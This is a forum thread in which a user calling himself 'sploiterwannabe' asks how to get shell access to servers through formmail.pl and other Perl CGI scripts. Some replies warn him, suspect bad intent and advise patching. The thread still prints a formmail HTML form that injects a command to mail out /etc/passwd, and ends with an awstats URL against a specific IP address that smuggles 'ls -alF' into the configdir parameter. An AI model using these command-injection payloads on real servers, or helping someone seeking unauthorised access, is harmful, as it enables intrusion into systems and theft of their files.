could i gain access to the server with this type of script, and perform commands like ls -al ?
if so, what are the datas?
Printable View
could i gain access to the server with this type of script, and perform commands like ls -al ?
if so, what are the datas?
:confused:
form = "form" like you fill out
mail = e-mail
".pl" is not a Polish pornographic site :eek: it's Perl (the language, not the harbour)
It is designed to let people fill out and e-mail forms on websites AFAIK.
I really don't understand your question, as it is fairly specialist software.
But I would recommend that you read the front page of this site a bit more carefully.
yep i have read, and discussion here is about web security
most perl scripts can make anybody gain access to servers
like count.cgi for example or awstats.pl, calendar.pl
with this scripts somebody could view files and folders on certain servers
Yep, there was a known vulbnerabiltiy in formmail that would allow one to execeute shell commands and abuse a mail server.
here is a little blurb.
http://www.ctssn.com/linux/formMailExploit.html
Yeah, my point it is that it is probably way too specialised. It has been around quite a while, and I do believe that it could be exploited 3 or more years ago. I think that it has been beefed up a lot since then.
I would check the current situation if you are going to use it on a website, as there may still be vulnerabilities. However, I suspect that you would need quite a lot more wrong with your site for it to be a serious problem.
Sure there has been quite a lot of malware written in Perl, but remember it was written for that purpose, not as a form serving e-mail system :)
My advice is if you are going to use it, make sure that EVERYTHING is patched, and do a bit of research. As I said there were problems 3 or 4 years ago.
:)
was hoping for some shell access data for this type of script
Why do you need shell access? When I want shell access I walk to the machine and utilize the keyboard.
I take it this isn't your system.....
... his name is sploiterwannabe .... I don't think he has the highest intentions ... could be wrong
the vulnerability in formmail.pl is an old ond dating back ti 2001. this was fixed with ver 1.06.
<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="[email protected]; cat /etc/passwd | mail [email protected]">
<input type="submit" name="submit" value="submit">
</form></body></html>
here's some old css code.... it wont work. it did but not anymore. this is true for all the so called vulns you mentioned. when a hole is discovered it gets fixed it doesn't just sit around waiting for you.
Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
Most perl scripts? I don't think so. Only the badly written ones.Quote:
Originally posted here by sploiterwannabe
yep i have read, and discussion here is about web security
most perl scripts can make anybody gain access to servers
like count.cgi for example or awstats.pl, calendar.pl
with this scripts somebody could view files and folders on certain servers
We have found that any webserver that has been running for more than a few years has a good chance of running a bad perl script like formmail. There was a time when a large percentage of "home pages" got their guestbooks, hitcounters, and form processors from Matt's Script Archive since they were the "cgi" download spot of choice in the mid 1990s.Quote:
Originally posted here by Black Cluster
Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
Just last fall we upgraded ~ 100 webservers a company had from another company they took over...All running bad versions of formmail. Was spammer heaven to be sure.
unppatched awstats script
http://194.168.163.54/cgi-bin/awstat....pl?configdir=|echo;ls%20-alF;exit|